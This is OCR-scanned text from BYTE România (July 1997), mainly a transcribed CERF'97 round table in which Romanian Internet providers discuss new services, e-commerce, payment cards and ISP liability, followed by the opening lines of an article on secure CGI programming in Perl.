74 BYTE Romania IULIE 1997
profesor gresind si refacand rationamentul.
Mie mi se pare acest lucru ceva absolut
fundamental. Eu de multe ori fac greșeli,
ca să văd că studenţii m-au urmărit şi ca să
vadă că pot să refac raționamentul pentru
că am făcut o greşeală. Asa ceva, într-un curs
care este făcut pe reţea, nu se întâmplă nicio-
dată. Deci, dacă vorbim de educaţie, de for-
marea unui om, asta nu se poate face decât
şi prin interacțiune umană. Și, al doilea lucru
pe care vreau să-l spun, pentru România va
mai dura puţin, până în momentul în care
cineva, de la Craiova, care lucrează la o fir-
mă, ştie că la Timişoara este un curs foarte
bun şi că, într-o după-masă, când are el timp,
se cuplează la serverul de la Timişoara să
asiste la cursul respectiv, care a fost făcut în
săptămâna aia, în nu ştiu ce zi sia fost inre-
gistrat si el il vede. Pentru asa ceva trebuie
să mai așteptăm.
Silviu Cucerzan: În nici un caz, acest
lucru nu se va întâmpla curând, pentru că
dispare componenta socială și, vedeţi deja,
au apărut supermarket-urile de pe reţelele
de calculatoare, unde comanzi tot ce vrei şi
toată lumea se plânge că nu se mai cunosc
nici măcar vecinii între ei. Ori, atmosfera
dintr-un campus e foarte importantă pen-
tru formarea omului. Adică, tocmai ne
plângeam de lucrul în echipă, că nu există,
eu mă îndoiesc că va exista, oricâtă interac-
tivitate va oferi o reţea. E cu totul altceva
să fii alături de un om, să munceşti împre-
ună cu el, decât dacă eşti la 200 de km de
el, chiar dacă va exista un maxim de inter-
activitate.
Irina Athanasiu: Rămâne problema dis-
tanţei. Aici nu-i vorba numai de problema
Universităţii Politehnice București, este vor-
ba și de Tg. Mureş şi de Timișoara. Colegii
mei nu sunt aici, printre altele pentru că nu
şi-au putut permite financiar.
Silviu Cucerzan: Totuşi, în proiectele
acestea există bani şi pentru astfel de întâl-
niri. Există bani pentru consultanţă din
partea firmelor. Pot veni parteneri de la
firme să predea cursuri. Deci „pot fi finanţate
astfel de cursuri, vor exista bani și în al doilea .
rând, nu vreau să spun Ministerul Învă-
fământului, ştiţi, dacă invitaţia nu venea pe
numele meu, eu nu eram acum aici. Adică,
dvs l-aţi invitat pe domnul prof. Corneliu
Stănescu, dir. general în Ministerul Învă-
țământului. E groaznic, eu ştiu cât îl vedem
noi la consiliu şi cât avem nevoie să ne con-
sultăm. Poate trebuia făcută o invitaţie de
genul, vă rugăm să delegaţi pe cineva, deci,
nu știu, la noi a venit invitaţia pe numele
dl-ui prof. Dincă care era plecat, dacă nu
venea pe numele meu eu nu eram aici. Dân-
sul ar fi zis, eu nu pot să vin şi nu mai venea
nimeni aici.
Rodica Constantinescu (ICI - RoEdu-
net): Eu consider că ceea ce se întâmplă în
România, în privinţa conectivităţii la comu-
nitatea internaţională prin furnizorii de ser-
vicii Internet şi care sunt vreo 20, este ceva
fantastic pentru societatea românească. Este
adevărat, aşa cum spunea dl. Braşoveanu,
această tehnologie informaţională trebuie
să fie suport pentru restul tehnologiilor uti-
lizate în educaţie. Şi vreau să vă spun că eu,
navigând prin Internet, am văzut câte instru-
mente fantastice au fost făcute, aceste instru-
mente care sprijină educaţia, instrumente
informatice care sunt interactive şi accesate
de la distanţă prin Internet. $i cu această
ocazie, ţinând cont că dl. Mihai Jalobeanu
din păcate lipseşte, vreau să vă semnalez
primul simpozion cu participare inter-
națională, legat de instruire prin Internet,
care are loc în România si care este organi-
zat de dl. M. Jalobeanu şi alţi colaboratori
din tara, simpozion care se numeşte Roma-
nian Internet Learning Workshop şi a cărui
pagină Web, mă rog, cu mirror-urile care
există, poate fi cu o adresă pe care, dacă
doriţi, v-o pot spune (http://oc1.itim-cj
/rilw/)
Darvas Attila: În concluzie, putem
remarca o îmbunătăţire a dotării tehnice,
față de anul 89, dar insuficientă fata de cer-
intele din ziua de azi şi pentru cerinţele de
pregătire pentru ziua de mâine. Sper ca sem-
nalul lansat de participanţii la această masă
rotundă să fie recepționat de cei responsa-
bili de soarta învățământului de la noi. Vă
mulțumesc pentru participare.
[Convorbirea a fost consemnată de pe caseta
video înregistrată la CERF, de Mircea Sabău:
msabau@agora.ro]
DI. Tudor Macovei.
ILUSTRAȚII: XXXX XXXXXXX O 1996
DOSAR
Internet
în România
nul acesta la CERF'97, în cadrul
programului de seminarii şi con-
ferinţe, organizate de Comput-
er Press Agora, masa rotundă
din ultima zi, a fost dedicată pentru Internet.
Am beneficiat în organizare de ajutorul dom-
nului Iosif Fettich, director Netsoft Srl, şi
îndrumarea d-nei prof.dr.Irina Athanasiu,
cărora le mulțumesc şi pe această cale. Dar,
iată cum s-au desfăşurat discuţiile:
Darvas Attila: Subiectul ultimei mese ro-
tunde este Internetul. Subiectul este, cred, de
mare interes şi mulțumesc invitaţilor şi pub-
licului că ne-au onorat cu prezenţa. În conti-
nuare, dau cuvântul d-nei prof.dr. Irina Atha-
nasiu, pe care o rog să conducă discuţiile.
Irina Athanasiu: Fiind a 3-a întâlnire, pri-
ma observaţie, pe care vreau s-o fac, este că,
atunci când am organizat masa rotundă,
acum un an, era foarte ușor să ne aşezăm la
masă, eram poate cinci, poate şase. La ROSE
era ciudat că eram 16, dar, de data aceasta,
discutând cu organizatorii, era clar că nu mai
puteam să-i punem pe ISP-işti la o masa,pen-
tru că am numărat în jur de 20 si asta este un
semn bun, înseamnă că celor 6 de la început
le-a mers bine, celor 16 din toamnă le-a mers
bine, şi sper să le meargă bine şi celor noi
veniți astăzi. Cu această introducere, vreau
să intru în subiectul zilei de astăzi. Eu am
făcut o schiță, cu ce am vrea să discutăm, şi
aş lansa o primă întrebare pentru furnizorii
de servicii Internet:- ce servicii noi oferă
providerii de Internet în România?.
Liviu lonescu (Eunet): E greu de spus
servicii noi, pentru că Internetul are deja o
familie atât de mare de servicii că n-o să
inventăm noi servicii noi. Deci, la nivel de
holding european, am hotărât să punem
accent mai mare pe servicii cu valoare adău-
gată şi nu numai pe număr de conexiuni.
Servicii noi pe care le vom oferi în Româ-
nia, deşi nu ştiu cât de mare va fi impactul,
vor fi un serviciu de fax, unul de backup pe
Internet, serviciul de plăţi electronice.
Octavian Greavu (Planeta Internet):
Pentru că e vorba de servicii noi, chiar dacă .
nu e vorba de Internet provideri,este vorba
de propunerea unui produs care poate să
Masă rotundă la CERF'97
fie util, în acelaşi timp, și furnizorilor Inter-
net. Revista Planeta Internet a avut ocazia,
acum câteva zile, să primească producătorii
unui decodor pt. Internet. Mulţi dintre dvs.
îl cunosc, mulți l-au testat, dar poate că mulți
dintre dvs. n-au avut încă ocazia să-l vadă. O
soluţie de a afişa și de a naviga cu acest
decodor care aduce paginile Web pe televi-
zor. Pentru furnizorii Internet este o soluţie
în plus să le crească numărul de abo-
naţi.Adică, nu numai celor care au posibili-
tatea să aibă un PC, nu numai celor care sunt
până acum în aria dvs. de activitate. Dum-
neavoastră puteţi să vă extindeți aria de acti-
vitate, grație acestui NetBox, şi să va largiti
D-na prof. lrina Athanasiu
conducând discuțiile
abonaţii, considerând că toți cei care sunt
posesori de televizor, şi au o linie banală de
telefon acasă, sau sunt cuplaţi prin cablu -
este o variantă şi pentru asta - pot să fie
abonaţii dvs. Va trebui să cunoaşteţi pro-
dusul îndeaproape şi este o soluţie pentru
furnizorii de Internet.
Prof.dr.Moisa Trandafir (Intercomp):
Noi oferim servicii Internet prin Vsat şi Star-
nets: Ca să răspund la întrebarea pe care
mi-a lansat-o colega mea Irina, am diversi-
ficat puţin serviciile oferite în servicii stan-
dard și profesionale, din două motive: unul
din motive comerciale şi unul din motive
tehnice, bineînţeles că cele două sunt legate
între ele. Dar, motorul a fost partea de mar-
keting comercial pentru a împărți aceste ser-
vicii. Deci, avem servicii mai ieftine, stan-
dard, şi mai scumpe, profesionale. Am real-
izat primul proiect, deci pot să spun că avem
deja experienţa de a oferi serviciul mai
departe, de intranet bazându-ne pe două cri-
terii care se vehiculează la ora actuală la noi,
Virtual Private Network, adică realizarea
unei rețele virtuale private mapată pe infra-
structura pe care noi am construit-o acuma.
Deci putem să construim rețele virtuale pri-
vate pt. utilizatori care, eventual, pot să aibă
o rețea închisă cu aplicaţii de intranet, şi am
început să creştem gama de servicii pe ser-
vere, adică spaţiul pe serverele noastre, și
spaţiu fizic pt. instalarea serverelor clientu-
lui. În condiţiile în care clientul are o linie
destul de lentă, noi îl incurajăm să aducă
serverele la noi în sediu. Astfel, am început
să avem o fermă de servere cu care acordăm
aceste servicii noi.
Dragos Titescu (Global One Commu-
nications): La noi serviciile sunt deja impar-
ţite şi nu mai avem nimic de împărțit, noi,
practic, avem o linie dedicată traficului
Internet, o linie terestră de 256KB.
Tudor Panaitescu (Logic): Din punctul
de vedere al serviciilor nu avem nimic nou.
Din punctul de vedere al răspândirii locu-
rilor de unde puteţi să accesaţi serviciile
Internet şi nu numai Internet: în rețeaua
noastră sunt 11 numere de acces în țară. În
viitorul foarte apropiat, poate o lună, poate
două, se va extinde numărul la 30.
Iosif Fettich (NetSoft Tg. Mureș): Unul
din serviciile pe care le considerăm noi, pe
care le vom oferi, este un serviciu de ştiri.
Va fi un server care să lucreze de la noi şi cu
ştirile noastre. Va fi accesibil cât de curând.
Rotaru Alexandru (IIRUC SA): Reţeaua
Rolink s-a extins la 24 de noduri de acces în
acest moment. Ca servicii oferite: yelow
pages la o viteză mare de acces, al doilea este
un model de distribuţie al siturilor cu diverse
puncte de acces, şi o colaborare cu firma
Oracle, pentru realizarea de softuri specifice
prin intermediul acestor rețele multipunct.
Deci, colaborarea cu firma Oracle se va
materializa şi prin următoarele acţiuni
IULIE 1997 BYTE România 75
Dosar
Internet în România
comune.
Mihai Bătrâneanu (PCNet): Aş împărți
noutăţile în două domenii: cele referitoare
la conectivitate, deci noi am dat drumul la
un tronson cu partenerii noştri DigiCom la
Ieșirea în Internet direct în SUA şi servicii
profesionale pentru companii, care vor să
plătească și servicii pt. persoane particulare
petronson rapid. Referitor la serviciile Web,
pe 20 aprlie am dat drumul la transmiterea
live postului de radio Pro FM și o altă nou-
_ tate ar fi colaborarea cu CNN, deci Internet
paging prin Internet.
Dan Popescu (Kappa): Din punctul de
vedere al conectivităţii, vrem să extindem
interconectarea între reţele de care se
vorbeşte foarte mult acum. În continuare,
aşa cum probabil știți, pagina noastră a
luat un premiu la CERF în materie de Web,
insistăm foarte mult pe reclame și oferim un
serviciu de fax e-mail rapid celor care nu
au e-mail, astfel încât aceştia primesc mesa-
jele prin fax, am dat drumul la serviciul de
emisie (broadcasting) al TVR1, însă, mo-
mentan, conducta în țara noastră nu este așa
de mare încât să fie vizionat foarte bine în
întreaga tara, la cei 20KB/sec.
Irina Athanasiu: Daca nimeni nu mai
vrea să anunţe noutăţi în domeniul servicii-
lor, propun să discutăm în continuare o ga-
mă de servicii f. mportantă și anume despre
comerțul electronic. E o şansă foarte impor-
tantă pentru România existența acestui gen
de servicii, existența comerțului electronic
deoarece, într-un mod mult mai util, putem
să fim văzuţi din afară. Aş vrea să-i întreb pe
furnizorii de servicii Internet din România
cum stau cu oferirea de comert electronic pe
Internet, ce prespective vad pentru acest gen
de servicii și, în general, ce comentarii s-ar
putea face în acest domeniu.
Liviu Ionescu: Eu n-am sa mi refer la
comerţul electronic, ci am să mă refer la alte
probleme pe care le avem cu toţii. Ca furni-
zori de servicii Internet, a rămas problema
comerțului de servicii și a plăţii acestora.
După părerea mea, a discuta acum despre
comerțul electronic este ceva prematur, câtă
vreme mecanismele de plată pe care le au
la dispoziţie majoritatea, nu vorbesc despre
cei puţini care-şi permit să plătească ser-
viciile, ci e vorba de utilizatorii normali care
de abia își permit să plătească câţiva dolari
pentru abonamentul lunar, pentru care,
dacă noi adoptăm o soluţie de plată în avans,
cum facem să le recuperăm banii. În aceste
condiţii, tare curios aș fi să aflu, în primul
rând, dacă colegii au găsit soluții minune
prin care să rezolve şi problema plăţii
serviciilor şi apoi alte probleme de comerţ
electronic. Noi am schimbat sistemul de evi-
denta, de baze de date, existent în spatele
firmei, ca să încurajăm plăţile în avans.
76 BYTE România IULIE 1997
Mihai Bătrâneanu: Liviu are dreptate.
Dar Irina se referea la alte aspecte. Din
februarie, noi am dat drumul la un maga-
zin pe Web, şi printre CD-uri avem şi cărți.
Sincer să fiu, mai mult de 20 de CD-uri nu
vindem pe lună, deci, să zic aşa, n-ar fi un
magazin rentabil. Însă, chiar dacă acest ma-
gazin nu este rentabi, noi am considerat că
este necesar să-l facem. Şi, mai devreme sau
mai târziu, va ajunge gi la noi acest gen de
serviciu. In general, vom încerca să dez-
voltăm astfel de servicii locale, deci, să ofer-
DI. prof. Trandafir Moisa
im posibilitatea utilizatorlor de a beneficia
de aceste servicii on-line.
Moisa Trandafir: Problema asta ne pre-
ocupă şi pe noi, pentru că este la americani
şi trebuie să ne luăm și noi după ei. Deci,
problema este următoarea: comerțul
electronic are cel puţin două faze, faza de
marketing și prezentarea produselor şi
faza de tranzacţie. În ceea ce priveşte plăţile,
este deocamdată greu de implementat, dar
partea de marketing şi prezentare se poate
face. Noi am utilizat o tehnică numită out-
sourcing în America, am delegat această
activitate firmei RomNet, care are şi
www.romnet.ro în ferma noastră de ser-
vere. Ei deja au clienţi şi lucrează în felul
următor: practic, contractele se fac cu ofer-
tanții şi am creat un serviciu de acces gratu-
it numai la serverul www.romnet.ro. Cli-
enţii pot să facă acces gratuit, să vadă
produsele şi să le cumpere, dacă le place.
După aceea, cumpărarea se face luând legă-
tură directă cu ofertantul, şi banii se scot din
afacere, practic din contractele care se fac
cu ofertanţii. Vrem s-o dezvoltăm mai
departe și dacă reuşim, va fi o aplicaţie
interesantă de comerţ electronic, cu Asoci-
ația Agenţiilor de Turism din România, cu
care am semnat recent un contract $i care
am vrea să fie prima aplicaţie realizată de
noi de comerţ electronic în adevăratul sens
al cuvântului, în România. Avem două
tehnologii, tehnologia de la Microsoft şi o
altă linie, în colaborare cu RomSys, utilizând
linia de produse de la Sun Microsystems. Să
vedem care e mai bună, pe aceea o alegem.
Rotaru Alexandru: În cazul nostru, am
dezvoltat un sistem cerere-ofertă en-gros,
prin poşta electronică, am dezvoltat o
redacţie comercială, organizată în jurul
Web-ului, dar încă nu se poate pune pro-
blema efectuării plăţilor prin Internet. În
schimb, se pot pune probleme de eficienti-
zarea reclamelor, adică se pot face statistici
şi alte lucruri, legate de marcarea Web-
urilor în reţea, pentru a putea fi într-ade-
văr accesate produsele oferite de către o
companie. Noi lucrăm cu aceste companii
pentru a îmbunătăţi siturile, în vederea
viitorului comerţ electronic.
Moisa Trandafir: Există, la ora actu-
ală, două mijloace de plată electronice
folosite, CreditCard și CreditBank. După
părerea mea, în România va trece foarte
mult timp până se vor răspândi CreditCard-
urile. Dar, în schimb, CreditCard-urile iau
amploare tot mai mult în Europa. Una din-
tre consorţiile, care lucrează la acest proiect,
se bazează pe o firmă din Anglia, care dez-
voltă așa zisele SmartCard-uri sau portofelul
electronic. Deci, este ca o cartelă telefon-
ică pe care o încarci cu o anumită sumă şi pe
care o consumi până la limita epuizării sumei
respective. Transferul se poate face între
portofeluri electronice, pe linii telefonice,
între bancă şi portofel, pentru a încărca
suma respectivă. În literatura de specialitate
se preconizează că, în anul 2010, Credit-
Card-urile o să fie practic absorbite de
SmartCard-uri. Pe acestea se pot pune
parole, data naşterii şi așa mai departe,
inclusiv încărcarea unei sume de bani. Cred
eu că, pentru România, această variantă ar
fi mai bună. Rămâne de văzut cât costă
aparatele, SmartCard-urile. Şi atunci nu se
mai pune problema autentificării. Se con-
sumă numai în limita sumei înscrise pe
SmartCard.
Dragos Titescu: Există deja Visa în
România şi chiar funcționează. Noi avem
deja în rețea două bănci, care s-au răspân-.
dit destul de mult în teritoriu. Nu mai este
tocmai Internet, ci este rețeaua, cu niște
sisteme de protecţie și securitate ceva mai
spectaculoase. Este vorba de bancă, bani și
să ştiţi că durează luni, dacă nu ani, până să
sepună la punct o astfel de reţea. Este foarte
greu, plus mentalitatea omului de pe stradă,
spunea Liviu că cine plăteşte mai mult.
Câţi de la noi se duc să-şi ia un Credit-
Card? Pentru că există si pentru o sumă
mică se poate obţine.
Din public: Aș dori să fac o precizare. Eu
reprezint EuroCard. S-a folosit aici o termi-
nologie care poate să inducă în eroare. Pe
piața actuală a tranzacţiilor bancare există
Internet în România
Dosar
CreditCard şi DebitCard. Acestea două
sunt, practic, acelaşi lucru, arată la fel,
tehnologia este aceeaşi, numai că Credit-
Card înseamnă că banca îţi dă credit, iar
DebitCard înseamnă că banca îţi trage din
contul curent.Ceea ce spuneţi cu Smart-
- Card-ul, nu este decât o nouă tehnologie.
Dragoş Tiţescu: Noi avem pe rețeaua
noastră destul de multe puncte instituite, le
găsiţi în noul Palatal Telefoanelor, în centru
pe lângă Mihai Viteazul, sunt puzderii. Dar
durează foarte mult până să se răspân-
dească aceste carduri. La implementare nu
impune nimeni nimic băncii. Visa nu impune
nimic. Banca se duce la Visa şi-i cere apro-
bare.
Iosif Fettich: Aș dori să aflu, de la colegii
mei, în ce măsură reclama pe Internet este
percepută ca utilă de către consumatori.
Este o problemă cu care fiecare se confrun-
tă şi primele dintre problemele cu care ne
confruntăm noi cel mai des este că mulți
clienți spun că încă nu e necesară reclama
pe Internet, după primele încercări de acest
gen. Mi-ar place să aud o poveste de succes,
de la cineva care face reclama pe Internet
pentru o firmă și care să spună că, şi dacă
costă de cinci ori mai mult, merită să-mi
fac reclamă, pentru mine este un câştig.
Irina Athanasiu: Următorul subiect pe
care vreau să-l lansez se referă la o problemă
delicată, şi anume în ce măsură furnizorii de
Internet sunt dispuşi sau, cum vedeţi răspun-
derea providerilor de Internet fata de cilenti.
Si, in acelasi timp, cum vedeti raspunderea
clienţilor față de provderii de Internet si asta
relativ la probleme de securitate, nu mă gân-
deam la securitate, văzută ca hacker, ci în ce
măsură, dacă un client este atacat, este
răspunzător, service providerul, şi invers,
în ce măsură dacă un client afişează pe Inter-
net o informaţie care n-ar trebui să apară,
sau utilizează Internetul într-un mod în care
n-ar trebui să fie utilizat, ce fel de răspun-
dere putem să cerem sau în ce mod putem
să rezolvăm răspunderea clientului faţă de
service provider.
Dragoș Tiţescu: Ceea ce spun eu s-ar
putea să placă, s-ar putea să nu placă. Este
povestea magazinului de peste drum de
mine care vinde aparate de bucătărie.
Vecinul de la patru şi-a luat nevestei un cuțit
de bucătărie, face salată foarte bună, iar
vecinul de la doi i-a înjungiat amanta cu un
astfel de cuţit. Îl facem răspunzător pe
patronul magazinului ? Eu ofer acces și nu
ştiu dacă am voie să intervin. Pe de altă parte,
când el este atacat, atunci pot să încerc să-l
apăr, să pun niște filtre eventual, dar dacă
el face ceva, nu ştiu dacă am eu dreptul să
intervin. Acesta e un punct de vedere .
Ştefan Bornuz (Vest Conex SA Cluj):
Reprezint o firmă de integrator de sisteme
de montaj computerizat, şi suntem mari con-
sumatori de servicii internet comercial. Ne
place să credem că am fost primii clienți de
Internet din Cluj. Noi, în activităţile noastre,
avem atât de mare nevoie de servicii Inter-
net încât acuma, de Paşti, a venit cineva să
ne spună să devenim furnizori de servicii
Internet. Asta însă fără a fi furnizori de
conectivitate Internet. Şi sper că furnizorii
de conectivitate Internet vor accepta ideea
că un furnizor de servicii Internet este şi cel
care oferă hosting. Ne-a deranjat ca și clienţi
lipsa de dinamism a vieţii firmelor românești
pe Internet i, in aceasta idee, am iniţiat o acţi-
une comercială. Din păcate, n-am avut timp
suficient s-o pregătim şi s-o lansăm cu ocazia
CERF-ului. Este vorba de un concurs, cine
vizitează pagina noastră de Internet, în
perioada 1-15 iunie poate să câştige un cal-
culator Pentium, tocmai în ideea de a crea un
serviciu de hosting, care să dinamizeze puţin,
şi să comercializeze mai mult decât este la
nivelul acesta Internetul românesc. Având în
vedere conectivitatea, am încercat tot ce se
poate. Suntem foarte mulţumiţi de serviciile
de acces pe care ni le-a oferit Eunet-ul, însă,
schimbarea politicii de tarifare Rom Telecom
ne-a făcut să renunțăm deocamdată, la ser-
viciile Eunet. Acum suntem mulţumiţi de
providerul de conectivitate Vsat şi încercăm,
în permanență, alte soluţii. În peregrinările
noastre pe la diferiţi furnizori de conectivi-
tate, am avut tot felul de surprize de cum ară-
ta contractul respectiv. Un provider, prin
contract, era îndrituit să taie legătura în cazul
în care noi ne abatem de la probleme de
moralitate, probleme de conduită samd, dar
ne punem problema în ce măsură dânsul se
transformă în instanță de judecată. A ne pre-
veni că nu este frumos să facem un anumit
lucru sau altul pe Internet, de a-şi deroga
responsabilitatea asupra acţiunilor noastre
ni se pare normal, dar, a se transforma in
instanță de judecată , deci daca noi contra-
venim bunelor maniere ei ne taie conectivi-
tatea, cine decide? Dânşii ? Păi, în cazul de
față, eu pot să îmi elimin toţi partenerii de pe
piaţă, mă duc la primul mail primit de la o
firmă care nu-mi place, şi spun, dl-e vă rog
să-i tăiați conectivitatea, pentru că mi-a trim-
isun mail „servus Ştefan“ și sunt profund jig-
nit. Dânsul se transformă în instanță de jude-
cată să zică da, servus Ştefan este o jignire.
Sau dânsul este cel care apreciază că o „înjură-
tură Ştefane“ este o ofensă sau nu. Deci,
problema pe care vroiam să o ridic este care
ar fi formula contractuală și care ar fi răspun-
derea furnizorilor de conectivitate vizavi de
un furnizor de servicii Internet, care este
delimitarea răspunderilor și cât trebuie să ia
asupra lui cel care oferă conectivitate.
Irina Athanasiu: Aţi spus, la început, că
firma dvs a avut mare nevoie de servicii
Internet. Puteţi să ne explicati putin de ce,
ce înseamnă acest lucru ?
Ştefan-Mircea BORNUZ: Noi suntem
furnizori de servicii de control acces şi pon-
taj computerizat. Ne trebuie oferte de
cartele, de sisteme de utilizare a cartelelor,
ne trebuiau standarde de existenţă a car-
telelor, de formate de cartele şamd., echipa-
mente specifice. În România, este foarte
Uşor să găseşti o tastatură, un motherboard,
dar un ceas de pontaj inteligent, un element
de citire pt.cartelele cu bandă magnetică, cu
cip este mai greu. Ei, pentru noi Internetul
a însemnat mult.
Am primit ulterior (M.Sabău), un mail
de la dl. Ștefan Bornuz, pe care-l înserez aici:
Intervenţia mea a fost vis-a-vis de pro-
blema responsabilității ISP, în asigurarea
unei utilizări 'normale! a serviciilor de rețea
către toţi clienţii. Am dorit să subliniez că
aceasta este o problemă deosebit de delicată,
pe care nu o putem trata doar după bunul
nostru simț de ISP-işti şi dădeam exemplul
unui furnizor de conectivitate care, în con-
tract, specifica că îşi rezervă dreptul de a sista
imediat legătura celor care prin natura
mesajelor transmise sau a informaţiei pub-
licate 'cauzează supărare (iritare), neplăcere,
anxietate (neliniște) inutilă. Trecând cu ved-
erea problemele de formă, această formu-
DI. Rotaru Alexandru
lare mi se pare deosebit de riscantă (şi, poate,
chiar abuzivă) ca fond: ISP-istul în discuţie
își atribuie capacitatea de a aprecia dacă un
mesaj sau o informaţie cauzează supărare...
și preia responsabilitatea de a aprecia dacă
un mesaj sau o informaţie 'cauzează
supărare... Doream să concluzionez, că,
dacă, în general, pentru o societate comer-
cială este bine să aibă în permanenţă asis-
tență juridica, pentru un ISP-ist este o
condiţie obligatorie.
Moisa Trandafir: În această problemă,
aresponsabilității clienților faţă de provider,
sau a providerilor față de clienţi, eu cred că
una dintre abordările posibile trebuie să plece
de la faptul că nimeni nu este perfect, nici
JULIE 1997 BYTE România 77
Dosar
Internet în România
providerul, nici clientul. Dar, asta nu este
decâto teorie. Eu, practic, am încercat acuma
o exprimare, s-ar putea ca ea să fie doar
aproximativă. Cred că între 20-25% din
resursele materiale şi umane, noi le folosim
DI. Ștefan-Mircea Bornuz
şi pentru a asigura securitatea. Un lucru
important este să educăm tinerii, să aibă gri-
jă de propria lor informaţie. Pentru că în ge-
neral, conturile atacate au fost cele care au
fost neglijate, în sensul că nu s-au mai schim-
bat parolele, au fost date parolele altora, sau
s-au făcut accese din diferite reţele şi parolele
au fost interceptate. Cei care au fost grijulii
cu propriul cont au fost, în general, feriti de
astfel de atacuri. În privinţa contractelor, în
România există teoria că valoarea unui con- .
tract este mai mică decât cea înscrisă în con-
tract. Închipuiţi-vă un proces între un pro-
vider şi un client, care plăteşte un abonament
de 50$ pe lund, si un proces care îşi aşteaptă
rândul după altele în care se dispută milioane,
poate zeci de milioane de dolari.
Rotaru Alexandru: Vreau să vă dau două
exemple, care mi le amintesc şi n-am avut
timp săvorbesc în public despre ele, sunt din
istoria acestor acțiuni şi anume situaţii pe
care le-a avut grupul de Unix. Cineva a
emis niște mesaje care conțineau cuvântul
turc. Şi un cetățean din Turcia a trimis isto-
ria turcilor. Acea istorie a turcilor a trimis-o
repetitiv, timp de o săptămână și, mă rog, s-a
umplut discul, s-a enervat, și soluţia a fost
aceea de a decupla pe respectivul emitent al
mesajelor. Al doilea lucru este un accident,
care s-a întâmplat în 1994, cred, sau 1995,
în care un utilizator, din orașul Sibiu, ar fi
trebuit să recepționeze un mesaj de lungime
1.5K. Din cauza unei erori, mesajul a început
să vină permanent cu o repetiţie de 6-8
mesaje pe minut. Acest lucru s-a întâmplat
toată noaptea. Cazul a fost rezolvat, prin
punerea unui filtru care să respingă mesajele,
returnându-le şi astfel a căzut mașina care
emitea mesajele. În momentul acela, s-a cre-
at o problemă internaţională: cine plăteşte
acest trafic care a durat vreo 10 ore ? Din
78 BYTE România -ULIE 1997
fericire, nu am intrat într-un proces, ci fir-
ma a cărui program a produs eroarea, a plătit
acel trafic. Revenind la problemă, ceea ce
putem face cu utilizatorii şi cu clienţii reţelei
este să implementăm, prin contract, niște
probleme standard şi unele care nu sunt
prinse acolo, cel puţin să le discutăm.
Mihai Bătrâneanu: Problema este una
conceptuală. În România serviciile nu sunt
apreciate. Ele sunt considerate, mi-e greu şi
să spun cum sunt considerate. În România,
oamenii preferă să cumpere un mouse, un
calculator, un obiect la care să se uite. Este
foarte greu să-i convingi să plătească un ser-
viciu. Deci, asta-i principala problemă con-
ceptuală. Discutăm despre responsabilitate,
când noi alergăm după clienţi să ni se plă-
tească, să respecte un contract. Să-l dau în
judecată ? Responsabilitatea pleacă de la
educaţia atât a clientului cât şi a furnizoru-
lui de servicii. Dacă se semnează un contract,
în principiu acesta trebuie respectat.
Irina Athanasiu: Aș vrea să continuăm
discuția. Am văzut pe câțiva provideri care
nu au spus încă nimica, poate că nu am găsit
întrebările pe care să vi le punem, de exem-
plu, este cineva de la ICI, în ultima vreme
s-au întâmplat lucruri noi la ICI, am niște
colegi universitari la Timişoara care sunt
într-o mare suferință datorită schimbărilor
de la ICI, poate că n-am reușit să-i captăm
cu întrebările pe care le-am pus, dar poate
că am putea afla lucruri noi de la aceştia.
Rodica Ciocea (ICI București): Vroiam
să spun despre o încercare, nu este un ser-
viciu pus la punct, o încercare de a face un
serviciu de acces la un director X500 prin
intermediul unui server www. Am făcut un
sistem experimental, cu un prim set de
date să spunem, nu suficient de mare ca să
fie concludent, dar, în condiţiile actuale,
spunem că funcționează. Este un mod dea
solicita înscrieri de date în acest serviciu .
Serban Stănășilă (DigiCom): DigiCom
preferă să fie un furnizor pentru furnizori.
Radu Bogdan (Electronum SA): Electro-
num SA este un punct de institutie standard.
Iosif Fettich: Am văzut că toată lumea
s-a ferit un pic să ia atitudine în problema
răspunderii. Se pare că nu avem altă soluţie
decât să expediem răspunsuri. Sunt situații
delicate, în care service providerul este efec-
tiv pus în postura de a judeca și de a acționa
sau nu. Este altfel în situaţiile în care există
un precedent. Şi unul din exemple ar putea
fi situaţia în care apare o plângere că cine-
va, pe Internet, face rele. Mergând pe firul
problemelor, se ajunge la un service provi-
der care are un client. Nu se știe dacă acela
este cel care face rele sau nu. Ca service
provider sunt îndreptăţit să o fac său nu,
sunt obligat să o fac sau nu, să supraveghez
ce face acest client. Dacă restul lumii strigă
tare că ăla face rele, pot să mă pun în pos-
tura să zic dl-e, e un client care plăteşte reg-
ulat, în avans, nu ştiu ce face, pentru că
lucrează într-un shell securizat. Dacă vreau
să văd ce face, trebuie să fac lucruri pe care,
poate prin contract, mă angajez să nu le
fac.Ce fac? Îmi păstrez un client bun, sau iau
decizia să-l decuplez. Dacă vine cineva şi
plăteşte să-i găzduiesc un sit porno, eu decid
că e porno sau nu, mă uit pe el şi zic că e
porno sau zic ce frumose! Şi sunt multe situ-
atii in care, efectiv, service providerul este
pus in situatia sa judece . Nu pot sa ma
ascund şi să spun că singura mea datorie este
să asigur cilenţilor mei servicii 24 din 24 de
ore. Dacă cineva se plânge că ceva nu merge,
noaptea mă sună pagerul şi mă duc să rezolv
problema. E un pic mai mult decât atât.
Din public: După mine, problema este
mai simplă. Cât pierd deconectând acel uti-
lizator care plăteşte regulat dar care
generează probleme, în comparaţie cu cât
pierd dacă cineva se simte ofensat de ceea
ce face acel utilizator. Responsabilitatea este
în lanţ. Dacă eu sunt conectat la cineva în
DI. losif Fettich
afară și eu sunt dat în judecată, înseamnă că,
şi respectivul care îmi asigură conectivitatea,
se află în același lanţ de responsabilităţi. În
momentul în care eu sunt supus unor pre-
siuni din afară, fac o analiză şi văd dacă meri-
tă să continui relaţia cu acel client sau nu,
sau îl deconectez, fiindcă este o potenţială
sursă de pierdere pentru mine.
Irina Athanasiu: Am tot amânat mo-
mentul în care să revenim la problemele
noastre practice. V-a întreba ce noutăți mai
există, apropos de legăturile de servicii,
dacă mai avem noutăţi la legăturile între
providerii de Internet.
Liviu Ionescu: Nu are rost să discutăm
acuma despre ce legături are fiecare cu
fiecare. Urmează, după câte știu, întâlnirea
ISP-istilor.
[Convorbirea a fost consemnată de pe caseta
video înregistrată la CERF, de Mircea Sabău:
msabau@agora.ro]
Programare CGI
sigură în Perl
imbajul Perl este un limbaj in-
terpretat - compilat în timpul
încărcării. Iniţial a fost scris de
către Larry Wall pentru a ușura
iE
nişte sarcini administrative, fiindcă nu a -
vrut să folosească alte programe care aveau
limitări însemnate.
Limbajul se poate învăţa foarte uşor
deoarece conţine elemente bine cunos-
cute din alte limbaje.
Se pot scrie programe eficiente cu-
noscând doar o mică parte a limbajului, iar
programele pot fi testate imediat datorită
